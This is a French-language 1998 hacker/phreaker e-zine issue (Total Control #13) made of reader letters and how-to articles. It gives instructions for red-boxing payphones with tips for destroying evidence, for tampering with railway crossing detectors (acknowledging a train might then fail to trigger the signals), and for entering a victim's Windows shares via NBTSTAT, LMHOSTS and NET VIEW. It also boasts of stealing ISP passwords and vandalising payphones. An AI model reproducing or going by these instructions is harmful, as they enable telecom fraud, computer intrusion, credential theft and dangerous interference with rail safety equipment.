*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8
___________________________________________
|                                         |     WE CONTROL YOU AND THERE'S
|                          .x             |
|        ....nnnH>       :MM"             |     NOTHING YOU CAN DO ABOUT IT
|   'HHMMMMMMMMMM>     :MMf               |
|    ""``  MMX        xMM"                |
|          MMM       XMM"                 |  /$$$$$$$$$$$$$$$$$$$$$$$$$$$$$\
|         'MMM>     :MMf                  |  $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
|         'MMM>     MMM                   |  $$$$$                     $$$$$
|         'MMMX    :MMX                   |  $$$$$  Total Control is : $$$$$
|         XMMMX    XMMX                   |  $$$$$                     $$$$$
|         XMMMM    XMMX                   |  $$$$$    * Err418         $$$$$
|         XMMMM>   'MMM                   |  $$$$$                     $$$$$
|         MMMMML    ?MMX                  |  $$$$$    * MindUser       $$$$$
|         MMMMMX     *MMX                 |  $$$$$                     $$$$$
|         MMMMMM      #MMM.               |  $$$$$    * Cluster        $$$$$
|         MMMMMM       `*MMh:             |  $$$$$                     $$$$$
|        'MMMMMM>        `"*MMhx.         |  $$$$$                     $$$$$
|        '*****M!            `"*M         |  $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
|                                         |  $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
|         TOTAL          CONTROL          |  \$$$$$$$$$$$$$$$$$$$$$$$$$$$$$/
|                                         |
|         *  M A G A Z I N E  *           |
|_________________________________________|

*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8*8

*----------------------------------------------------------------------------*
İ                                                                            İ
İ                    Total Control,  Num‚ro 13,  Mai 1998                    İ
İ                                                                            İ
İ                       http://totalcontrol.home.ml.org                      İ
İ                                                                            İ
*----------------------------------------------------------------------------*
İ  Groupes affili‚s : BELL - QUEBECTEL - TELEBEC - NORTEL - GRC - FBI - CIA  İ
*----------------------------------------------------------------------------*

/------------------\
|  AVERTISSEMENT   |
\------------------/

Ce document contient des informations ill‚gales si vous les utilisez mais
puisque, ici, elles ne sont distribu‚es que pour des fins ‚ducatives,
elles peuvent ˆtre consid‚r‚es ‚tant l‚gales (vous me suivez ?). Le personnel
de Total Control ne vous encourage pas … utiliser ces techniques.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                               0=--------------=0
                               |  Introduction  |
                               0=--------------=0
                      Par Err418 (err418@technologist.com)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

        Bonjour … vous tous lecteur de TC magazine. J'espŠre que vous allez
bien... moi je me porte … merveille. Nous avons introduit un nouveau membre
dans le staff de Total Control et il s'agit de Cluster. D'ailleurs, le ASCII
d'ouverture de ce num‚ro est de lui. Cluster est, comme les autres membres de
TC, amoureux de la t‚l‚phonie et des Millenniums. Alors, Cluster, nous te
souhaitons la bienvenue dans notre ‚quipe et j'espŠre que tu t'y impliqueras
avec beaucoup de plaisir :-)

        En passant, si vous souhaitez nous parler sur IRC, vous pouvez nous
trouver sur le channel #tctrl sur EFNET.

        Ok, now, voici un petite publicit‚ que j'ai promise au groupe de h/p
de la r‚gion de Qu‚bec : Corruption Addicts. Ce groupe est trŠs actif sur la
scŠne de la ville de Qu‚bec et contient des ex-membres de NPC alors n'h‚sitez
pas … les rencontrez sur #c-a (efnet) et sur leur site que vous pouvez voir
… l'URL suivante : www.asphyxiie.org/corruption ! Je vous le dis, les releases
sont vraiment de qualit‚ et le site est magnifique (chapeau nmare !). De plus,
le fondateur de C-A, Phaust, m'a dit que s'il d‚cide de se bouger un jour, il
‚crirait un article pour Total Control... espŠrons qu'il se d‚cide... :-)

******* BREAKING NEWS *******
Le groupe C-A est mort... et oui... Phaust et Nmare ont re‡u la visite de la
GRC … leur appartement et se sont fait confisquer leur matos informatique...
Je tiens … dire que le BUST est survenu aprŠs que le groupe se dissoude donc
ne pensez pas que la GRC a r‚ussi … tuer un des meilleurs groupes du Quebec.
Il s'agit d'une d‚cision commune de tout les membres de C-A.

DerniŠre chandelle … C-A et bonne chance … Nmare et … Phaust !
******* BREAKING NEWS *******

        Si vous d‚sirez contribuer … TC magazine, envoyez vos articles … :
err418@technologist.com et il me fera un plaisir de les mettre dans un
prochain num‚ro. Bonne lecture !


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                          Le courrier des lecteurs
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

---------------------------------------------------------------------
Date: Fri, 17 Apr 1998 22:38:09 -0400
From: Fatal Speed <karnage@webworqs.com>
To: err418@technologist.com
Subject: yahoo

Salut mon toi!
Heye super, Total Control!!!
Ca fait 3-4 mois que j'me bidonne en lisant PLA (l'original, the only
one), pis assteure je peut le faire en francais... wouhou!!!!
Continue a sortir des issue, on apprecie!
A plusse.. hehe

Fatal Speed

-------------------
R‚ponse

TC:     hehehe merci d'aimer notre travail... continue de lire TC !

---------------------------------------------------------------------
From: drunky_99@hotmail.com
To: err418@technologist.com
Subject: un fan de ton zine
Date: Thu, 16 Apr 1998 10:34:17 PDT

Salut, moi c‚ Drunky!

Je viens de d‚couvrir ton zine (20 avril 1998).Il ‚tait temps que
quelqu`un parle de phreaker sur le scŠne du Qu‚bec. Pour ma part je suis 
plutot sur la scŠne du cracking (trŠs nouveau, mais j'ai des bons progs).
D`ailleurs en naviguant sur le net, j`ai tomb‚ sur le prog Revelation!
C'est un prog qui d‚voile les passwords qui sont sous ast‚riques avec
Win95.

Tu installes le prog sur une disquette pis tu fais le tour des magasins 
qui ont internet en d‚monstration. Tu t'assures qu'il n'y a personne autour 
de toi (‚vident). Tu run le prog pis voil…! En passant je ne suis pas
responsable de vos activit‚s ill‚gales, … vos risques et p‚rilles!

Vous direz surement "Ou trouver ce programme ?" Facile www.snadboy.com
En embarquant sur la page vous aller dans le link Revelation.
Avant de downloader le prog je vous conseille d'aller voir les "screen 
shot" pour mieux comprendre comment marche le programme.

Goodbye and nice cracking!
From your alcoholic friend Drunky...

-------------------
R‚ponse

TC:     Salut Drunky, ouais c super cool ce prog l…... Ca fait un bout que
        ici on l'utilise... j'te dis que j'en ai ramasser des accounts PPP de
        QuebecTel avec le truc des magasins... Le pire c'est que ca me sert
        … rien moi alors je les donnes … un accros que je connais (acxel ;-)

---------------------------------------------------------------------

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
             D‚couvrez qui se cache derriŠre une adresse spoof‚e
                        Par Merlin2 (digital2@hotmail.com)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Bon, ‚tant donn‚ que de plus en plus de monde ont des adresses spoof‚es
lorsqu'il vous nuke ou autre, voici un moyen de trouver leur IP. Voici les
instructions … suivre que j'ai trouver sur le site de Anti-online (vous
trouvez plusieurs bons programmes pour vous protegez ou attaquer):

#1.     Votre moniteur vous avertit que quelqu'un vous nuke, et vous voulez
        voir l'ip de quelqu'un que vous pensez que c'est. vous faite /whois JP
        (JP est le nick). Vous trouvez que JP est JP@this.is.a.spoofed.ad

#2.     Vous faites un /dns this.is.a.spoofed.ad. Nous d‚couvrons alors que le
        hostmask ne se r‚sout pas. Cela nous permet de savoir que JP est
        probablement entrain de faire du spoofing.

#3.     Aucun problŠme. Nous n'avons qu'… taper une simple petite commande de
        serveur IRC, Soit: /quote userip JP. Qui nous donne:

        JP=+JP@130.49.71.21

        Nous avons maintenant son vrai IP.

#4.     Maintenant, une fois encore nous tapons /dns 130.49.71.21. Ce qui
        donne son addresse DNS qui est quelque chose comme :

        jpvst7.j.resnet.pitt.com

#5.     Cela peut maintenant ais‚ment vous aidez … confirmer vos doute, et
        mˆme le nuker vous aussi.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                            Des photos de Millennium
                      Par Cluster (cluster@comports.com)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Voici des photos des diff‚rents types de Millennium. Les fichiers sont joints
avec TC #13 et sont disponibles dans la section FILEZ du site web.

Fichier       Grosseur  Contenu
=======       ========  =======
img001.jpg    22k       T‚l‚phone Millennium de table
img002.jpg    24k       T‚l‚phone Millennium … cartes
img003.jpg    24k       T‚l‚phone Millennium … paiement universel

Rincez-vous l'oeil :-)

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                  Le Red Boxing au Qu‚bec : Mythe ou r‚alit‚ ?
                      Par Err418 (err418@technologist.com)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

        Le red boxing est un vrai fl‚au aux USA et il connait aussi quelques
balbutiments au CaCanada :-) Cependant, dans notre belle province, qu'en ai-t'il?
Dans cet article, vous d‚couvrirez l'univers du Red boxing de fond en comble.
Voici les diff‚rentes parties qui composeront mon texte :

1) Qu'est-ce que le Red Boxing ?
2) Comment a-t-il ‚t‚ d‚couvert ?
3) Comment faire sa Red Box ?
4) Sur quel t‚l‚phone public ‡a marche ?
5) Est-ce risqu‚ ?

1) Qu'est-ce que le Red Boxing ?
================================

        Avant de vous expliquer qu'est-ce qu'une Red Box, vous devez savoir
comment fonctionne le paiement, la v‚rification et l'authorisation lorsque
vous placez un appel.

* Note: Le terme "t‚l‚phone" dans cet article r‚fŠre aux t‚l‚phones publics
        de type NON-millennium soit les Centurions qui sont habituellement
        noirs ou bruns.

        Quand vous voulez appeller … un num‚ro … partir d'un Centurion, la
compagnie de t‚l‚phone doit savoir combien d'argent vous mettez dans le "coin
slot". Pour un appel local, la v‚rification attends que vous ayez mis un
25 cents et alors vous permet de placer votre appel. S'il s'agit d'un appel
interurbain, la TeLcO attends que vous d‚posiez le montant n‚cessaire avant de
vous laissez placer l'appel. Pour effectuer toutes ces ‚tapes de v‚rification
et d'authorisation, le t‚l‚phone et la centrale doivent communiquer entre eux
et ils le font avec l'aide de tonalit‚ (N-ACTS). C'est-…-dire que lorsque
vous ins‚rez, par exemple, 25 cents dans la coin slot, le t‚l‚phone ‚mets
sur la ligne une tonalit‚ pr‚cise. Pour une piŠce de 10 cents, le t‚l‚phone
‚mets une tonalit‚ mais d'une autre fr‚quence. Il existe une tonalit‚
diff‚rente pour chaque piŠce de monnaie support‚e par le Centurion.

        Le principe de la Red Box est fort simple quand vous connaissez
comment le t‚l‚phone et la centrale communique ensemble. Il suffit d'‚mettre
les tonalit‚s vous-mˆmes au que ce soit le t‚l‚phone qui les ‚mette. Vous me
direz s–rement : MAIS COMMENT CELA EST POSSIBLE ? Ceci est possible puisque
le t‚l‚phone et la centrale communique sur la mˆme ligne t‚l‚phonique qui
vous sert … placer vos appels DONC qui est reli‚ au combin‚ du t‚l‚phone.
Et oui ! C'est aussi simple que ‡a, il suffit d'‚mettre les tonalit‚s … mˆme
l'endroit ou vous parlez... avec le combin‚. En r‚sum‚, c'est ainsi que le
Red Boxing fonctionne : on ‚met des "fausses" tonalit‚s pour tromper la
centrale et lui faire croire que l'argent … ‚t‚ introduit dans le t‚l‚phone.

2) Comment a-t-il ‚t‚ d‚couvert ?
=================================

        Grƒce … un article dans un journal d'ing‚nieur d'AT&T qui diffusait
les fr‚quences des tonalit‚s correspondantes aux piŠces de monnaies (ACTS),
des ‚tudiants du MIT (Minnesota Institute of Technology) en ing‚nirie ont
fait quelques tests et se sont rendus compte que l'‚mission de "fausses"
tonalit‚s ‚tait possible. Ils publiŠrent une s‚rie d'articles sur leur
trouvaille dans des journaux universitaires et c'est ainsi que cette technique
tomba entre les mains de ceux qui savent comment l'exploiter : les phreaks.

3) Comment faire sa Red Box ?
=============================

        Si ce texte est le premier sur le Red Boxing que vous lisez, vous
devez ˆtre tout excit‚s et vous devez crier comme des d‚fonc‚s devant votre
‚cran : "Mais merde, c'est ben trop hot tout ‡a.... COMMENT JE M'EN FAIS UNE?
Envoye crache le mottons que je m'y mette tout de suite !!!!" Et bien voici
ce que vous attendez...

        Il existe deux techniques pour se faire sa propre Red Box. Celle
de l'enregistrement et celle du "dialer radio shack". Personnellement, je
trouve la technique de l'enregistreuse plus facile … faire et celle du
"dialer" un peu trop technique. C'est pour ‡a que je n'expliquerai pas comment
faire une Red Box avec la technique "dialer" mais en gros il s'agit de prendre
un "dialer" (en vente chez Radio Shack) et de modifier le diamants pour que
les fr‚quences ‚misses ne soient plus celles du compositeur (1234567890*#)
mais celles que l'on a de besoin pour la Red Box. Je ne sais mˆme pas quelles
doivent ˆtre les caract‚ristiques du diamant pour pouvoir ‚mettre les
tonalit‚s frauduleuses...

        Donc, voici la technique de l'enregistreuse. Vous avez besoin d'un
objet capable d'enregistrer des sons et des tonalit‚s n‚cessaires. Faites
attention puisque les tonalit‚s canadiennes (N-ACTS) diffŠrent des celles
utilis‚es aux USA (ACTS). Vous utilisez l'objet d'enregistrement pour mettre
les tonalit‚s sur son support d'enregistrement et aprŠs vous allez les faire
jouer avec cet objet devant la partie utilis‚e pour parler du combin‚.
Attention : la qualit‚ du son des tonalit‚s doit ˆtre BONNE.

        Vous me demanderez s–rement : Mais ou prendre les tonalit‚s
valides pour le Canada ? Et bien, sur le site de ToTal Control dans la
section FILEZ et elles seront aussi jointes … ce num‚ro de TC (ca-tones.zip).

        Un dernier conseil : utilisez si possible un petit gadget
d'enregistrement num‚rique rapide pour enregistrer les tonalit‚s parce que
‡a fait un peur suspect de mettre une enregistreuse en avant d'un combin‚ ou
encore pire, un Gatto Blaster. hehehehe. (Petite parenthŠse, savez-vous quelle
est la traduction fran‡aise de Gatto Blaster ? C'est un TONNITRUANT. C'‚tait
une question dans un de mes examens de fran‡ais … un moment donn‚... SHIT
Merde, je d‚lire... excusez-moi :-)

4) Sur quel t‚l‚phone public ‡a marche ?
========================================

        Sur TOUS les t‚l‚phones publics non-digitals. Donc, excluez les
Millennium : NON le Millennium ne communique pas avec la TelCo pour effectuer
une v‚rification de montant.. il v‚rifie LUI-MÒME le tout et il authorise
LUI-MÒME l'appel. Aucune communication avec la centrale lorsqu'un appel est
plac‚.

QUELS SONT VULNRABLES ? RPONSE : Les Centurions

5) Est-ce risqu‚ ?
==================

        Bien s–r, le Red Boxing est un acte criminel de fraude t‚l‚phonique
et est sanctionn‚ par le Code Criminel, donc il repr‚sente un risque.

        Cependant, ce risque reste assez faible puisqu'au Qu‚bec les TelCos
n'ont pas a faire face … un fl‚au et ne sont pas consciente que ce ph‚nomŠne
peut leur causer du tort donc ne surveille pas activement ce genre de fraude.

        Voici quelques conseils de s–ret‚ que vous devez respect‚ pour Red
Boxer avec plus de s–ret‚ :

- Si une de vos tentatives de Red Boxing ‚chout, changez de t‚l‚phone ou
cessez vos activit‚es de Red Boxing pour la journ‚e.

- Ne pas Red Boxer pour placer un appel local.

- Uilisez un petit gadget d'enregistrement digital rapide pour vos tonalit‚s.
Ceci vous permettra d'appuyer sur le bouton RECORD si vous voyez les policiers
arriv‚s donc d'effacer toutes les preuves de votre actes :-)

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
        Comment niaiser des truckers avec une track de chemin de fer
                Par Crow Killer (diane.chasse@sympatico.ca)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Pr‚face
=======

Toutes les voies ferr‚es ,au Canada, sont ‚quip‚es de "d‚tecteurs" qui, acti-
v‚s par un train, allument les lumiŠres et les cloches prŠs des routes, right?
Imaginez que l'ont puisse les contr“ler a volont‚... (pour les pas vite, re-
gardez le titre).


Principe de fonctionnement
==========================
Pour comprendre, rien de mieux qu'une image:
(CN001.gif)

No 1: Poteaux lumineux (varient en hauteur et grosseur, selon l'endroit)
No 2: Poste central (trŠs grosse boŒte grise)
No 3: Poste de d‚tecteur (trŠs loin de la route, + petit que le poste central)
No 4: D‚tecteur (sorte de plaque de bois fix‚e a la track) 

Quand un train passe sur les d‚tecteurs, il active une sorte de relais dans le
poste de d‚tecteur qui renvoit une impulsion ‚lectrique au poste central qui
dirige le courant du poteau ‚lectrique vers les lumiŠres.
En gros, c'est de mˆme que sa marche.

Les d‚tails
===========

Le poste central est reli‚ a une ligne de courant semblable a celle de
n'importe quel bulding. Soud‚ sur le boŒtier, il y aune sorte de COCOT grise
(avec une PETITE porte) qui contient une grosse switche et un carnet semblable
a celui plus bas qui allume les lumiŠres et la cloche."On peut pas l'ouvrir: y
a un cadenas!" Mais cette sorte de cadenas (comme tous ceux du CN) s'ouvre avec
un box de ratchet  1/2. On s'en sert comme une cl‚ pour d‚visser la bolt a
l'int‚rieur. Tout ce qu'on a a faire c'est d'actionner la switche quand un
truck (ou mieux, un tanker) est … 100 pieds ou moins de la traverse de chemin
de fer. Seul inconv‚nient: on est bien trop proche de la route pour le faire
sans se faire voir. On en vient donc au poste de d‚tecteurs.

Les postes de d‚tecteurs contiennent:
(CN002.gif) 
                                                                                           
No 1: Batteries (transparentes)
No 2: Carnet ou fiche des "bilans des inspections" (‚tat des piles, etc)
No 3: Indique … quel poids le d‚tecteur se d‚clenchera...
No 4: je le sais pas. (aprŠs tout, je n'ai que 13 ans!)
No 5: Fil venant du d‚tecteur et fil partant au poste central 
Tuyau marqu‚ PVC: par ou passent les 2 fils reli‚s au poste central
Ligne bleue: bypass (voir plus bas)

Il s'ouvre de la mˆme fa‡on que l'autre mais l…, pour faire ce qu'on veut,
c'est plus compliqu‚. On va avoir besoin d'un fil pour faire un petits bypass
entre la bolt la plus en haut … droite des deux "cossins inconnus" (No 4) et
le fil reliant la bolt en bas … gauche, vers le 2e fil. (demandez moi pas
pourquoi sa marche, je le sais pas: j'ai butch‚ et sa a march‚). *Petite remar-
que: il y a un d‚lai de 5 …10 secondes pour que le signal ai atteint le poste
central et d‚clenche tout le patatra. Vous avez donc en masse de temps pour
vous cacher.

ATTENTION! Examinez bien le petit carnet: il indique les dates des inspections
(en moyenne1 fois/semaine). Sa serait tu plate si tu te ferais buster... 

Conclusion
==========

Voici quelques petites id‚es amusantes (exp‚riences personnelles):

-D‚clencher la cloche … 3 heure du matin

- Mettre la r‚sistance du poste des d‚tecteurs au plus haut a une heure pas-
sante (sa peut ˆtre pas mal dangereux, car si le train n'est pas assez pesant,
il ne d‚clenchera pas le relais du poste central...)

- Un de mes amis c'est achet‚ un relais t‚l‚command‚ de porte de garage (le
riche!) et aprŠs l'avoir install‚ sur une des batteries, il pouvait d‚clencher
le systŠme a distance!

(Note de Err418 : Comme tout bon ‚diteur et pr‚sident d'un zine de H/P/C, je
me dois de tester les techniques pr‚sent‚es dans le zine que j'‚dites. Alors,
moi et Funky, on est all‚ tester ce petit truc et j'Ai ‚t‚ r‚ellement d‚‡u
puisqu'il n'a pas fonctionn‚. CEPENDANT, l'auteur de cet article m'assure que
son article est vrai DONC je le crois... c'est tout... test it by yourself.)

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 
                   Mes aventures avec les machines … Coke
                      Par Cluster (cluster@comports.com)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 

En premier  je voulais essayer de crosser un  Millennium; J'avais perc‚ un 25
cents  et  attacher une corde …  pˆche aprŠs,  mais disons  que ‡a n'a  pas eu
l'effet attendu (faire des appels gratos) plut“t le 25 cents … redescendu dans
le "retour des piŠces". De‡u  du r‚sultat je  me suis tourner vers une machine
… Coke, aprŠs  15 minutes  de gossage  j'ai r‚ussi  … lui soutirer quelques 25
cents. Mais  j'ai aussi  remarque la  grande instabilit‚  de ces  machines la:
aprŠs  avoir mit 1$ (la liqueur coutait 1,25$) je pŠse sur retour de change et
Hop! elle me redonne: 1$ et 4 x 25 cents. Bizarre!

Contrairement au Millennium les machines … liqueur on 2 compartiments:

        Le premier pour accumuler ton cash
        Le deuxiŠme qui contient du change classer genre en 1$, 25 cents, ...

Donc  si quelqu'un ne  re‡oit pas son change y'a  de forte chance que  si  la
prochaine  personne met moins  que le co–t d'une  liqueur (si t'en met plus ou
‚gal tu dois absolument en prendre une) et elle pŠse sur retour de monnaie ben
elle va surement pogner le change de la personne qui ne l'a pas re‡u. Amusant.
       
Si vous avez d'autres techniques  pour crosser les Millenniums ou les Machines
… Coke e-mailer vos d‚couvertes …:

               cluster@comports.com ou err418@technologist.com
------------------------------------------------------------------------------
En passant je voudrais f‚liciter un de nos supporters pour avoir d‚crisser le
lecteur  de carte magn‚tique d'une Millennium  … l'aide d'une barre de fer. Le
pauvre a afficher le message "PiŠces de monnaie seulement" pendant 3 jours.
hahAHaHhe
------------------------------------------------------------------------------

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 
                        Comment p‚n‚trer un dique dur
                Par La PaNtHŠRe Du WeB (LaPaNtHeRe@hotmail.com)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 

Bonjour, voici deux techniques qui vont vous permettre de prendre le controle
d'un disk dur. La premiŠre technique, pour l'utiliser vous devez avoir NETBIOS
et votre victime doit avoir Windows 95 ou Windows NT. La deuxiŠme technique
est beaucoup plus simple... mais vous devez convaicre votre victime d'accepter
votre fichier pour ensuite vous connecter sur le port 666 avec Ws_ftp (plus
de d‚tail plus bas...)

1) PremiŠre technique avec NETBIOS
==================================

LE PRINCIPE :

Depuis que NT 3.51 existe, Microsoft a implement‚ des commandes permettant de
communiquer avec d'autres PC, tout ca juste avec un driver pour votre carte
r‚seau, le protocole NETBEUI d'install‚, et le tout en ligne de commande, ce
qui permettait de r‚aliser des installations … distance par exemple. C'est
d'ailleurs encore beaucoup utilis‚, une simple disquette de boot, et paf, vous
pouvez installer plein de postes.  Ce protocole NETBEUI, reposant sur NETBIOS,
vous permet entre autres de partager des ressources sur le r‚seau, … condition
d'avoir install‚ le client "Client pour le r‚seaux Microsoft", et d'avoir
activ‚ l'option "Permettre … d'autres utilisateurs d'utiliser mes fichiers".
Dans ce cas, vous pourrez alors voir ce qui est partag‚ dans le fameux
Voisinage r‚seau de Partageur 95 ou de NT 4.  Certains d'entre vous sont en
train de lire ceci, se dise : "Arfff le con, il sait mˆme pas que Internet ‡a
repose sur les protocoles TCP/IP et pas NETBEUI". Et l…, je vous r‚ponds :
"Je sais mon enfant, mais il existe une passerelle !!". "Une passerelle ?
Entre NETBEUI et TCP/IP ?? Je le crois pas ? C'est pas possible ???" me
r‚pondrez vous !! Et pourtant si !! Microsoft ne pouvait pas se permettre
d'interdire ce type de passerelle, car tous les r‚seaux Internet utilisent
TCP/IP, et il fallait un moyen de convertir les noms de machines sous NETBEUI
en adresse IP.  C'est ce que fait le fichier LMHOST dans votre r‚pertoire
WINDOWS. Logiquement, si vous regardez maintenant, il n'existe pas, mais en
revanche vous devez avoir un LMHOSTS.SAM qui traŒne, qui est un fichier
d'exemple. Allez donc y jeter un coup d'oeil...

Donc vous avez compris, avec LMHOST, on peut donc aller voir les ressources
partag‚es de quelqu'un, … partir du moment qu'on connait son IP, le nom de sa
machine et ses ressources partag‚es. Et il faut aussi qu'il ait des ressources
partag‚es ‚videmment, mais ‡a faut pas ˆtre polytechnicien pour le comprendre.
Vu comme ‡a, ‡a fait beaucoup de chose … savoir.. mais pas tant que ‡a en fin
de compte, car Bill qui est bon pour nous, nous a donn‚ plein de belles
fonctions qui vont nous aider … combler les trous.

PremiŠre chose, pogner l'IP. L…, rien de plus facile, vous repŠrez l'IP ou
l'adresse du gars sur IRC par exemple. Si c'est l'IP num‚rique du type
123.123.123.123, pas de problŠme, si c'est un truc du genre
marcel@routeur.domaine.com, vous faites: PING -a routeur.domaine.com et vous
aurez son IP. Voil… une bonne chose de faite. Maintenant, ‡a serait sympa de
savoir le nom d'ordinateur de la personne dont vous voulez voir le disque dur.
Pour cela, Bill nous offre la fonction NBTSTAT qui permet de voir l'‚tat d'un
adapteur r‚seau, et les infos le concernant.

Tapez donc :
NBTSTAT -A 127.127.127.127  <- L'adresse IP de la cible hein , pas celle ci...

Ah oui, le -A signifie que c'est une adresse IP num‚rique que l'on donne. 
N'OUBLIER PAS, A MAJUSCULE)

Si la cible a NETBEUI d'install‚, vous devriez obtenir un truc du style :


C:\>NBTSTAT -A 194.114.95.141

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
MAURO <00> UNIQUE Registered
MICA <00> GROUP Registered
MAURO <03> UNIQUE Registered
MAURO <20> UNIQUE Registered
MICA <1E> GROUP Registered

MAC Address = 44-45-53-54-00-00

(SI C'EST CRIT "HOST NOT FOUND", C'EST QUE VOUS DEVEZ CHANGER DE CIBLE...)

Ce qui vous int‚resse c'est les noms avec ‚crit UNIQUE … c“t‚. Votre cible
utilise forc‚ment l'un de ces noms de machines en ce moment mˆme !! Et c'est
l… qu'intervient LMHOSTS.

Vous ‚ditez LMHOSTS avec EDIT par exemple, et vous tapez dans ce fichier :

194.114.95.141 MAURO #PRE

Donc, l'IP, suivi du nom de machine, suivi de #PRE, pour indiquer que cette
correspondance entre l'IP et le nom de machine doit ˆtre pr‚charg‚, pour ainsi
passer AVANT la r‚solution DNS.

Ensuite, on va r‚initialiser notre fichier LMHOSTS que vous venez juste de
sauvegarder, n'est ce pas ? Pour cela, vous tapez :

C:\>NBTSTAT -R

Et si tout se passe bien, vous obtenez :

"Successful purge and preload of the NBT Remote Cache Name Table."

Maintenant, nous allons nous occuper de chercher les ressources partag‚es par
notre copain.

Pour voir les ressources, vous allez taper NET VIEW, VIEW comme "voir" en
anglais, remarquez comme les choses sont bien faites. D'ailleurs cette
commande NET est extrˆmement puissante, faites donc un NET /? Pour vous en
convaincre !! Donc, ‡a doit donner un truc comme :

NET VIEW \\MAURO (MAURO car l… nous passons sur le protocole NETBEUI,
LMHOSTS va se charger de convertir le nom de machine en IP)

Et hop, dans mon exemple, ‡a donne ‡a :

(C'EST LA QUE MOI J'AI QUELQUES PROBLÒMES, JE NE RUSSI PAS A PASSER CETTE
TAPE...)

C:\>NET VIEW \\MAURO

Ressources partag‚es … \\MAURO

Nom de partage Type Commentaire

---------------------------------------------------

C Disque

D Disque

